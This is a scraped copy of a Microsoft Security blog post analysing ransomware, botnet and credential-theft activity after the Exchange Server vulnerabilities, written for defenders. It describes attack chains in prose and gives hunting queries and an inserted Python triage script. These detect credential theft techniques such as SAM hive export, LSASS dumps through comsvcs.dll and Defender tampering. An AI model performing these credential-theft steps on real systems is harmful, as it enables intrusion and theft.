 * Web shells - As of this writing, many of the unpatched systems we observed had multiple web shells on them. Microsoft has been tracking the rise of web shell attacks for the past few years, ensuring our products detect these threats and providing remediation guidance for customers. For more info on web shells, read [Web shell attacks continue to rise](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>). We have also published guidance on [web shell threat hunting with Azure Sentinel](<http://aka.ms/exchange-web-shell-investigation>).
 * Human-operated ransomware - Ransomware attacks pose some of the biggest security risks for organizations today, and attackers behind these attacks were quick to take advantage of the on-premises Exchange Server vulnerabilities. Successfully exploiting the vulnerabilities gives attackers the ability to launch human-operated ransomware campaigns, a trend that Microsoft has been closely monitoring. For more information about human-operated ransomware attacks, including Microsoft solutions and guidance for improving defenses, read: [Human-operated ransomware attacks](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).
 * Credential theft - While credential theft is not the immediate goal of some of these attacks, access to Exchange servers allowed attackers to access and potentially steal credentials present on the system. Attackers can use these stolen credentials for follow-on attacks later, so organizations need to prioritize identifying and remediating impacted identities. For more information, read best practices for building credential hygiene.

In the following sections, we share our analysis of known post-compromise activities associated with exploitation of the Exchange Server vulnerabilities, because understanding these TTPs helps defenders protect against other actors using similar tactics or tools.
While levels of disruptive post-compromise activity like ransomware may be limited at the time of this writing, Microsoft will continue to track this space and share information with the community. It\u2019s important to note that with some post-compromise techniques, attackers may gain highly privileged persistent access, but **many of the impactful subsequent attacker activities can be mitigated by practicing the principle of least privilege and mitigating lateral movement**.\n\n## DoejoCrypt ransomware\n\nDoejoCrypt was the first ransomware to appear to take advantage of the vulnerabilities, starting to encrypt in limited numbers shortly after the patches were released. Ransomware attackers often use multiple tools and exploits to gain initial access, including purchasing access through a broker or \u201creseller\u201d who sells access to systems they have already compromised. The DoejoCrypt attacks start with a variant of the Chopper web shell being deployed to the Exchange server post-exploitation.\n\nThe web shell writes a batch file to _C:\\Windows\\Temp\\xx.bat_. Found on all systems that received the DoejoCrypt ransomware payload, this batch file performs a backup of the Security Account Manager (SAM) database and the System and Security registry hives, allowing the attackers later access to passwords of local users on the system and, more critically, in the LSA Secrets portion of the registry, where passwords for services and scheduled tasks are stored.\n\n\n\n_Figure 2. xx.bat_\n\nGiven configurations that administrators typically use on Exchange servers, many of the compromised systems are likely to have had at least one service or scheduled task configured with a highly privileged account to perform actions like backups. 
**As service account credentials are not frequently changed, this could provide a great advantage to an attacker even if they lose their initial web shell access due to an antivirus detection**, as the account can be used to elevate privileges later, which is why we strongly recommend operating under the principle of least privilege.\n\nThe batch file saves the registry hives to a semi-unique location, _C:\\windows\\temp\\debugsms_, assembles them into a CAB file for exfiltration, and then cleans up the folders from the system. The file also enables Windows Remote Management and sets up an HTTP listener, indicating the attacker might take advantage of the internet-facing nature of an Exchange Server and use this method for later access if other tools are removed.\n\n\n\n_Figure 3. xx.bat actions_\n\nThe _xx.bat_ file has been run on many more systems than have been ransomed by the DoejoCrypt attacker, meaning that, while not all systems have moved to the ransom stage, the attacker has gained access to multiple credentials. On systems where the attacker moved to the ransom stage, we saw reconnaissance commands being run via the same web shell that dropped the _xx.bat_ file (in this instance, a version of Chopper):\n\n\n\n_Figure 4. DoejoCrypt recon command_\n\nAfter these commands are completed, the web shell drops a new payload to _C:\\Windows\\Help_ which, like in many human-operated ransomware campaigns, leads to the attack framework Cobalt Strike. In observed instances, the downloaded payload is shellcode with the file name _new443.exe_ or _Direct_Load.exe_. When run, this payload injects itself into _notepad.exe_ and reaches out to a C2 to download Cobalt Strike shellcode.\n\n\n\n_Figure 5. DoejoCrypt ransomware attack chain_\n\nDuring the hands-on-keyboard stage of the attack, a new payload is downloaded to _C:\\Windows\\Help_ with names like _s1.exe_ and _s2.exe_. 
This payload is the DoejoCrypt ransomware, which uses a _.CRYPT_ extension for the newly encrypted files and a very basic _readme.txt_ ransom note. In some instances, the time between _xx.bat_ being dropped and a ransomware payload running was under half an hour.\n\n\n\n_Figure 6. DoejoCrypt ransom note_\n\nWhile the DoejoCrypt payload is the most visible outcome of the attackers\u2019 actions, the access to credentials they have gained could serve them for future campaigns if organizations do not reset credentials on compromised systems. An additional overlapping activity observed on systems where _xx.bat_ was present and the attackers were able to get Domain Administrator rights was the running of scripts to snapshot Active Directory with _ntdsutil_\u2014an action that, if executed successfully, could give the attackers access to all the passwords in Active Directory from a single compromised system.\n\n## Lemon Duck botnet\n\nCryptocurrency miners were some of the first payloads we observed being dropped by attackers from the post-exploit web shells. In the first few days after the security updates were released, we observed multiple cryptocurrency miner campaigns, which had been previously targeting SharePoint servers, add Exchange Server exploitation to their repertoire. Most of these coin miners were variations on XMRig miners, and many arrived via a multi-featured implant with the capability to download new payloads or even move laterally.\n\nLemon Duck, a known cryptocurrency botnet named for a variable in its code, dove into the Exchange exploit action, adopting different exploit styles and choosing to use a fileless/web shell-less option of direct PowerShell commands from w3wp (the IIS worker process) for some attacks. 
While still maintaining their normal email-based campaigns, the Lemon Duck operators compromised numerous Exchange servers and moved in the direction of being more of a malware loader than a simple miner.\n\nUsing a form of the attack that allows direct execution of commands versus dropping a web shell, the Lemon Duck operators ran standard Invoke-Expression commands to download a payload. Having used the same C2 and download servers for some time, the operators applied a varied degree of obfuscation to their commands on execution.\n\n\n\n_Figure 7. Example executions of Lemon Duck payload downloads_\n\nThe Lemon Duck payload is an encoded and obfuscated PowerShell script. It first removes various security products from the system, then creates scheduled tasks and a WMI event subscription for persistence. A second script is downloaded that attempts to evade Microsoft Defender Antivirus, abusing the operators' administrative access to run the _Set-MpPreference_ command to disable real-time monitoring (a tactic that Microsoft Defender [Tamper protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) blocks) and add scanning exclusions for the C:\\ drive and the PowerShell process.\n\n\n\n\n\n_Figure 8. Lemon Duck payloads_\n\nOne randomly named scheduled task connects to a C2 every hour to download a new payload, which includes various lateral movement and credential theft tools. The operators were seen downloading RATs and information stealers, including [Ramnit](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Ramnit>) payloads.\n\n\n\n_Figure 9. Lemon Duck post-exploitation activities_\n\nIn some instances, the operators took advantage of having compromised mail servers to access mailboxes and send emails containing the Lemon Duck payload using various colorful email subjects.\n\n\n\n_Figure 10. 
Email subjects of possibly malicious emails_\n\n\n\n_Figure 11. Attachment variables_\n\nIn one notable example, the Lemon Duck operators compromised a system that already had _xx.bat_ and a web shell. After establishing persistence on the system in a non-web shell method, the Lemon Duck operators were observed cleaning up other attackers\u2019 presence on the system and mitigating the CVE-2021-26855 (SSRF) vulnerability using a legitimate cleanup script that they hosted on their own malicious server. This action prevents further exploitation of the server and removes web shells, giving Lemon Duck exclusive access to the compromised server. This stresses the need to fully investigate systems that were exposed, even if they have been fully patched and mitigated, per traditional incident response process.\n\n## Pydomer ransomware\n\nWhile DoejoCrypt was a new ransomware payload, the access gained by attackers via the on-premises Exchange Server vulnerabilities will likely become part of the complex cybercriminal economy where additional ransomware operators and affiliates take advantage of it. The first existing ransomware family to capitalize on the vulnerabilities was Pydomer. This ransomware family was previously seen using vulnerabilities in attacks, notably taking advantage of Pulse Secure VPN vulnerabilities, for which Pulse Secure has released security patches, to steal credentials and perform ransomware attacks.\n\nIn this campaign, the operators scanned and mass-compromised unpatched Exchange Servers to drop a web shell. They started later than some other attackers, with many compromises occurring between March 18 and March 20, a window when fewer unpatched systems were available. They then dropped a web shell, with a notable file name format: \u201cChack[Word][Country abbreviation]\u201d:\n\n\n\n_Figure 12. 
Example web shell names observed being used by the Pydomer attackers_\n\nThese web shells were observed on around 1,500 systems, not all of which moved to the ransomware stage. The attackers then used their web shell to drop a _test.bat_ batch file that performed a similar function in the attack chain to the _xx.bat_ of the DoejoCrypt operators and allowed them to perform a dump of the LSASS process.\n\n\n\n_Figure 13. Pydomer post-exploitation activities_\n\nThis access alone would be valuable to attackers for later attacks, similar to the credentials gained during their use of Pulse Secure VPN vulnerabilities. The highly privileged credentials gained from an Exchange system are likely to contain domain administrator accounts and service accounts with backup privileges, meaning these attackers could perform ransomware and exfiltration actions against the networks they compromised long after the Exchange Server is patched and even enter via different means.\n\nOn systems where the attackers did move to second-stage ransomware operations, they utilized a Python script compiled to an executable and the Python cryptography libraries to encrypt files. The attackers then executed a PowerShell script via their web shell that acts as a downloader and distribution mechanism for the ransomware.\n\n\n\n_Figure 14. PowerShell downloader and spreader used to get the Pydomer payload_\n\nThe script fetches a payload from a site hosted on a domain generation algorithm (DGA) domain, and attempts to spread it throughout the network, first over WMI using Invoke-WMIMethod to connect to systems, and falling back to PowerShell remoting with Enter-PSSession if that fails. 
The script is run within the context of the web shell, which in most instances is Local System, so this lateral movement strategy is unlikely to work except in organizations that are running highly insecure and unrecommended configurations like having computer objects in highly privileged groups.\n\nThe Pydomer ransomware is a Python script compiled to an executable and uses the Python cryptography libraries to encrypt files. The ransomware encrypts the files and appends a random extension, and then drops a ransom note named _decrypt_file.TxT_.\n\n\n\n_Figure 15. Pydomer ransom note_\n\nInterestingly, the attackers seem to have deployed a non-encryption extortion strategy. Following well-known ransomware groups like Maze and Egregor, which leaked data for pay, the Pydomer hackers dropped an alternative _readme.txt_ onto systems without encrypting files. This option might have been semi-automated on their part or a side effect of a failure in their encryption process, as some of the systems they accessed were test systems that showed no data exfiltration. The note should be taken seriously if encountered, as the attackers had full access to systems and were likely able to exfiltrate data.\n\n\n\n_Figure 16. Pydomer extortion readme.txt_\n\n## Credential theft, turf wars, and dogged persistence\n\nIf a server is not running in a least-privilege configuration, credential theft could provide a significant return on investment for an attacker beyond their initial access to email and data. Many organizations have backup agent software and scheduled tasks running on these systems with domain admin-level permissions. 
For these organizations, the attackers might be able to harvest highly privileged credentials without lateral movement, for example, using the COM services DLL as a living-off-the-land binary to perform a dump of the LSASS process:\n\n\n\n_Figure 17. Use of COM services DLL to dump LSASS process_\n\nThe number of observed credential theft attacks, combined with the high privilege of accounts often given to Exchange servers, means that these attacks could continue to impact organizations that don\u2019t fully remediate after a compromise even after patches have been applied. While the observed ransomware attempts were small-scale or had errors, there is still the possibility of [more skillful groups](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) utilizing credentials gained in these attacks for later attacks.\n\nAttackers also used their access to perform extensive reconnaissance using built-in Exchange cmdlets and _dsquery_ to exfiltrate information about network configurations, user information, and email assets.\n\nWhile Lemon Duck operators might have had the boldest method for removing other attackers from the systems they compromised, they were not the only attacker to do so. Others were observed cleaning up .aspx and .bat files to remove other attackers, and even rebuilding the WMI database by deleting .mof files and restarting the service. As the window on unpatched machines closes, attackers showed increased interest in maintaining access to the systems they exploited. 
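The credential-theft and persistence patterns described in this section can be triaged from endpoint telemetry. The following Python script is an added example, not code from the original post: it re-implements the logic of the Appendix hunting queries (children of w3wp.exe, reg save of the SAM/SECURITY hives, comsvcs.dll LSASS dumps, Set-MpPreference tampering, net user /add, the WDigest UseLogonCredential value, and Event IDs 4720/1102) over constructed sample events; the event layout, field names and the device id exch01 are assumptions.

```python
"""Triage Windows telemetry for the post-compromise patterns described in this section.

Added example, not code from the original post. It re-implements the logic of the
Defender for Endpoint hunting queries in the Appendix over constructed in-memory
events so it runs offline; the event dicts, field names and device id are assumptions
loosely modelled on the DeviceProcessEvents / DeviceRegistryEvents columns.
"""
import re

# Children of the Exchange IIS worker that the hunting query excludes as benign.
BENIGN_W3WP_CHILDREN = {"csc.exe", "cvtres.exe", "conhost.exe", "oleconverter.exe",
                        "wermgr.exe", "werfault.exe", "transcodingservice.exe"}
# Security log events called out in the investigation checklist.
SECURITY_EVENT_IDS = {4720: "user-account-created", 1102: "security-log-cleared"}


def _lc(value):
    return (value or "").lower()


def triage_process(ev):
    """Return finding names for one process-creation event (a dict)."""
    findings = []
    fn, cmd = _lc(ev.get("FileName")), _lc(ev.get("ProcessCommandLine"))
    parent = _lc(ev.get("InitiatingProcessFileName"))
    parent_cmd = _lc(ev.get("InitiatingProcessCommandLine"))
    # Anything the Exchange application pool spawns outside the benign list.
    if parent == "w3wp.exe" and "msexchange" in parent_cmd and fn not in BENIGN_W3WP_CHILDREN:
        findings.append("process-from-exchange-worker")
        if fn == "powershell.exe":  # Lemon Duck's web shell-less execution style
            findings.append("powershell-from-exchange-worker")
    # xx.bat / test.bat credential collection: saving the SAM or SECURITY hive.
    if fn == "reg.exe" and "save" in cmd and re.search(r"hklm\\(sam|security)\b", cmd):
        findings.append("registry-hive-export")
    # Living-off-the-land LSASS dump through the COM services DLL.
    if "rundll32" in cmd and "comsvcs.dll" in cmd:
        findings.append("lsass-dump-comsvcs")
    # Lemon Duck antivirus tampering (blocked by Tamper protection, but still logged).
    if "set-mppreference" in cmd and "disablerealtimemonitoring" in cmd:
        findings.append("defender-realtime-disabled")
    if "add-mppreference" in cmd and "exclusion" in cmd:
        findings.append("defender-exclusion-added")
    # Malwareless persistence: a new local account created with net.exe.
    if fn in ("net.exe", "net1.exe") and re.search(r"\buser\b.*/add\b", cmd):
        findings.append("local-account-created")
    return findings


def triage_registry(ev):
    """WDigest UseLogonCredential=1 makes LSASS keep plaintext passwords in memory."""
    if (_lc(ev.get("RegistryValueName")) == "uselogoncredential"
            and "wdigest" in _lc(ev.get("RegistryKey"))
            and str(ev.get("RegistryValueData")) == "1"):
        return ["wdigest-plaintext-enabled"]
    return []


def triage_security(ev):
    """Map a Security log event id to a finding, or nothing."""
    name = SECURITY_EVENT_IDS.get(ev.get("EventID"))
    return [name] if name else []


HANDLERS = {"process": triage_process, "registry": triage_registry, "security": triage_security}


def triage(events):
    """Run each event through the handler for its kind; return (DeviceId, finding) pairs."""
    hits = []
    for ev in events:
        for finding in HANDLERS[ev["kind"]](ev):
            hits.append((ev["DeviceId"], finding))
    return hits


def _proc(fn, cmd, parent, parent_cmd="cmd.exe"):
    """Build a constructed process event for the hypothetical device exch01."""
    return {"kind": "process", "DeviceId": "exch01", "FileName": fn, "ProcessCommandLine": cmd,
            "InitiatingProcessFileName": parent, "InitiatingProcessCommandLine": parent_cmd}


W3WP = 'w3wp.exe -ap "MSExchangeOWAAppPool"'
SAMPLE_EVENTS = [  # constructed sample telemetry, not real data
    _proc("cmd.exe", "cmd.exe /c whoami", "w3wp.exe", W3WP),
    _proc("conhost.exe", "conhost.exe 0xffffffff", "w3wp.exe", W3WP),  # benign child
    _proc("powershell.exe", "powershell.exe -enc <base64 elided>", "w3wp.exe", W3WP),
    _proc("reg.exe", r"reg save hklm\sam C:\windows\temp\debugsms\sam.hiv", "cmd.exe",
          r"cmd.exe /c C:\Windows\Temp\xx.bat"),
    _proc("rundll32.exe", r"rundll32.exe C:\Windows\System32\comsvcs.dll <args elided>", "cmd.exe"),
    _proc("powershell.exe", "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true; "
          "Add-MpPreference -ExclusionProcess powershell.exe", "cmd.exe"),
    _proc("net.exe", "net user svc_backup <password elided> /add", "cmd.exe"),
    {"kind": "registry", "DeviceId": "exch01", "RegistryValueName": "UseLogonCredential",
     "RegistryKey": r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest",
     "RegistryValueData": "1"},
    {"kind": "security", "DeviceId": "exch01", "EventID": 1102},  # event log cleared
    {"kind": "security", "DeviceId": "exch01", "EventID": 4624},  # ordinary logon, ignored
]

if __name__ == "__main__":
    for device, finding in triage(SAMPLE_EVENTS):
        print(f"{device}: {finding}")
```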
By utilizing "malwareless" persistence mechanisms like enabling RDP, installing Shadow IT tools, and adding new local administrator accounts, the attackers are hoping to evade incident response efforts that might focus exclusively on web shells, AV scans, and patching.\n\n## Defending against exploits and post-compromise activities\n\nAttackers exploit the on-premises Exchange Server vulnerabilities in combination to bypass authentication and gain the ability to write files and run malicious code. The best and most complete remediation for these vulnerabilities is to update to a supported Cumulative Update and to install all security updates. Comprehensive mitigation guidance can be found here: <https://aka.ms/ExchangeVulns>.\n\nAs seen in the post-exploitation attacks discussed in this blog, the paths that attackers can take after successfully exploiting the vulnerabilities are varied and wide-ranging. If you have determined or have reason to suspect that these threats are present on your network, here are immediate steps you can take:\n\n * Investigate exposed Exchange servers for compromise, regardless of their current patch status.\n * Look for web shells via our [guidance](<https://aka.ms/exchange-customer-guidance>) and run a full AV scan using the [Exchange On-Premises Mitigation Tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n * Investigate Local Users and Groups, even non-administrative users, for changes, and ensure all users require a password for sign-in. 
New user account creations (represented by Event ID 4720) during the time the system was vulnerable might indicate a malicious user creation.\n * Reset and randomize local administrator passwords with a tool like [LAPS](<https://aka.ms/laps>) if you are not already doing so.\n * Look for changes to the RDP, firewall, WMI subscriptions, and Windows Remote Management (WinRM) configuration of the system that might have been configured by the attacker to allow persistence.\n * Look for Event ID 1102 to determine if attackers cleared event logs, an activity that attackers perform with _exe_ in an attempt to hide their tracks.\n * Look for new persistence mechanisms such as unexpected services, scheduled tasks, and startup items.\n * Look for Shadow IT tools that attackers might have installed for persistence, such as non-Microsoft RDP and remote access clients.\n * Check mailbox-level email forwarding settings (both _ForwardingAddress_ and _ForwardingSMTPAddress_ attributes), check mailbox inbox rules (which might be used to forward email externally), and check Exchange Transport rules that you might not recognize.\n\nWhile our response tools check for and remove known web shells and attack tools, performing a full investigation of these systems is recommended. For comprehensive investigation and mitigation guidance and tools, see <https://aka.ms/exchange-customer-guidance>.\n\nAdditionally, here are best practices for building credential hygiene and practicing the principle of least privilege:\n\n * Follow guidance to run Exchange in least-privilege configuration: <https://adsecurity.org/?p=4119>.\n * Ensure service accounts and scheduled tasks run with the least privileges they need. 
Avoid widely privileged groups like domain admins and backup operators and prefer accounts with access to just the systems they need.\n * Randomize local administrator passwords to prevent lateral movement with tools like [LAPS](<https://aka.ms/laps>).\n * Ensure administrators practice good administration habits like [Privileged Admin Workstations](<https://docs.microsoft.com/en-us/security/compass/overview>).\n * Prevent privileged accounts like domain admins from signing into member servers and workstations using Group Policy to limit credential exposure and lateral movement.\n\n## Appendix\n\n### Microsoft Defender for Endpoint detection details\n\n**Antivirus**\n\nMicrosoft Defender Antivirus detects exploitation behavior with these detections:\n\n * Behavior:Win32/Exmann\n * [Behavior:Win32/IISExchgSpawnEMS](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgSpawnEMS.A&threatId=-2147212928>)\n * [Exploit:ASP/CVE-2021-27065](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:ASP/CVE-2021-27065>)\n * Exploit:Script/Exmann\n * Trojan:Win32/IISExchgSpawnCMD\n * [Behavior:Win32/IISExchgDropWebshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.B&threatId=-2147190469>)\n\nWeb shells are detected as:\n\n * [Backdoor:JS/Webshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/WebShell&threatId=-2147233581>)\n * [Backdoor:PHP/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:PHP/Chopper.B!dha&threatId=-2147231664>)\n * Backdoor:ASP/Chopper\n * Backdoor:MSIL/Chopper\n * [Trojan:JS/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:JS/Chopper!dha&threatId=-2147232033>)\n * Trojan:Win32/Chopper\n * 
[Behavior:Win32/WebShellTerminal](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/WebShellTerminal.A&threatId=-2147213299>)\n\nRansomware payloads and associated files are detected as:\n\n * [Trojan:BAT/Wenam](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:BAT/Wenam.A&threatId=-2147188992>) - _xx.bat_ behaviors\n * [Ransom:Win32/DoejoCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/DoejoCrypt.A&threatId=-2147189904>) - DoejoCrypt ransomware\n * [Trojan:PowerShell/Redearps](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/Redearps.A&threatId=-2147189091>) - PowerShell spreader in Pydomer attacks\n * [Ransom:Win64/Pydomer](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win64/Pydomer.A&threatId=-2147189083>) - Pydomer ransomware\n\nLemon Duck malware is detected as:\n\n * [Trojan:PowerShell/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/LemonDuck.A&threatId=-2147189579>)\n * [Trojan:Win32/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/LemonDuck.A&threatId=-2147189576>)\n\nSome of the credential theft techniques highlighted in this report are detected as:\n\n * [Behavior:Win32/DumpLsass](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/DumpLsass.A!attk&threatId=-2147237471>)\n * Behavior:Win32/RegistryExfil\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Suspicious w3wp.exe activity in Exchange\n * Possible exploitation of Exchange Server vulnerabilities\n * 
Possible IIS web shell\n * Possible web shell installation\n * Web shells associated with Exchange Server vulnerabilities\n * Network traffic associated with Exchange Server exploitation\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the DoejoCrypt and Pydomer ransomware campaign:\n\n * DoejoCrypt ransomware\n * Pydomer ransomware\n * Pydomer download site\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the Lemon Duck botnet:\n\n * LemonDuck Malware\n * LemonDuck botnet C2 domain activity\n\nThe following behavioral alerts might also indicate threat activity associated with this threat:\n\n * Possible web shell installation\n * A suspicious web script was created\n * Suspicious processes indicative of a web shell\n * Suspicious file attribute change\n * Suspicious PowerShell command line\n * Possible IIS Web Shell\n * Process memory dump\n * A malicious PowerShell Cmdlet was invoked on the machine\n * WDigest configuration change\n * Sensitive information lookup\n * Suspicious registry export\n\n### Advanced hunting\n\nTo locate possible exploitation activities in Microsoft Defender for Endpoint, run the following queries.\n\n**Processes run by the IIS worker process**\n\nLook for processes executed by the IIS worker process\n\n`// Broadly search for processes executed by the IIS worker process. 
Further investigation should be performed on any devices where the created process is indicative of reconnaissance \nDeviceProcessEvents \n| where InitiatingProcessFileName == 'w3wp.exe' \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| where FileName !in~ (\"csc.exe\",\"cvtres.exe\",\"conhost.exe\",\"OleConverter.exe\",\"wermgr.exe\",\"WerFault.exe\",\"TranscodingService.exe\") \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nSearch for PowerShell spawned from the IIS worker process, observed most frequently in Lemon Duck with Base64 encoding to obfuscate C2 domains.\n\n`DeviceProcessEvents \n| where FileName =~ \"powershell.exe\" \n| where InitiatingProcessFileName =~ \"w3wp.exe\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Tampering**\n\nSearch for Lemon Duck tampering with Microsoft Defender Antivirus.\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Batch script actions**\n\nSearch for batch scripts performing credential theft, as observed in DoejoCrypt infections.\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"cmd.exe\" \n| where InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"C:\\Windows\\Temp\" \n| where ProcessCommandLine has \"reg save\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nLook for evidence of batch script execution that leads to credential dumping.\n\n`// Search for batch script execution, leading to credential dumping using rundll32 and the COM Services DLL, dsquery, and makecab use \nDeviceProcessEvents \n| where InitiatingProcessFileName =~ \"cmd.exe\" \n| where 
InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"\\inetpub\\wwwroot\\aspnet_client\\\" \n| where InitiatingProcessParentFileName has \"w3wp\" \n| where FileName != \"conhost.exe\" \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Suspicious files dropped under an aspnet_client folder**\n\nLook for dropped suspicious files like web shells and other components.\n\n`// Search for suspicious files, including but not limited to batch scripts and web shells, dropped under the file path C:\\inetpub\\wwwroot\\aspnet_client\\ \nDeviceFileEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" \n| where FolderPath has \"\\\\aspnet_client\\\\\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project FileName, FolderPath, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Checking for persistence on systems suspected of compromise**\n\nSearch for creations of new local accounts.\n\n`DeviceProcessEvents \n| where FileName == \"net.exe\" \n| where ProcessCommandLine has_all (\"user\", \"add\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Search for installation events that were used to download ScreenConnect for persistence**\n\nNote that this query may be noisy and is not necessarily indicative of malicious activity alone.\n\n`DeviceProcessEvents \n| where FileName =~ \"msiexec.exe\" \n| where ProcessCommandLine has @\"C:\\Windows\\Temp\\\" \n| parse-where kind=regex flags=i ProcessCommandLine with @\"C:\\\\Windows\\\\Temp\\\\\" filename:string @\".msi\" \n| project filename, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Hunting for credential theft**\n\nSearch for logon events related to services and scheduled tasks on devices that may be Exchange servers. 
The results of this query should be used to verify whether any of these users have privileged roles that might have enabled further persistence.\n\n`let devices = \nDeviceProcessEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" and InitiatingProcessCommandLine contains \"MSExchange\" \n| distinct DeviceId; \n// \nDeviceLogonEvents \n| where DeviceId in (devices) \n| where LogonType in (\"Batch\", \"Service\") \n| project AccountName, AccountDomain, LogonType, DeviceId, Timestamp`\n\nSearch for WDigest registry key modification, which causes the LSASS process to store plaintext passwords.\n\n`DeviceRegistryEvents \n| where RegistryValueName == \"UseLogonCredential\" \n| where RegistryKey has \"WDigest\" and RegistryValueData == \"1\" \n| project PreviousRegistryValueData, RegistryValueData, RegistryKey, RegistryValueName, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for the COM services DLL being executed by rundll32, which can be used to dump LSASS memory.\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"rundll32.exe\", \"comsvcs.dll\") \n| project FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for Security Account Manager (SAM) or SECURITY databases being saved, from which credentials can later be extracted.\n\n`DeviceProcessEvents \n| where FileName == \"reg.exe\" \n| where ProcessCommandLine has \"save\" and ProcessCommandLine has_any (\"hklm\\\\security\", \"hklm\\\\sam\") \n| project InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\n## Indicators\n\nSelected indicators from attacks are included here; the threats may use files and network indicators not represented here.\n\n**Files (SHA-256)**\n\nThe following are file hashes for some of the web 
shells observed during attacks:\n\nDoejoCrypt associated hashes:\n\nLemon Duck associated hashes:\n\nPydomer associated hashes:\n\n**Network indicators**\n\nDomains abused by Lemon Duck:\n\n * down[.]sqlnetcat[.]com\n * t[.]sqlnetcat[.]com\n * t[.]netcatkit[.]com\n\nPydomer DGA network indicators:\n\n * uiiuui[.]com/search/*\n * yuuuuu43[.]com/vpn-service/*\n * yuuuuu44[.]com/vpn-service/*\n * yuuuuu46[.]com/search/*\n\nThe post [Analyzing attacks taking advantage of the Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": 
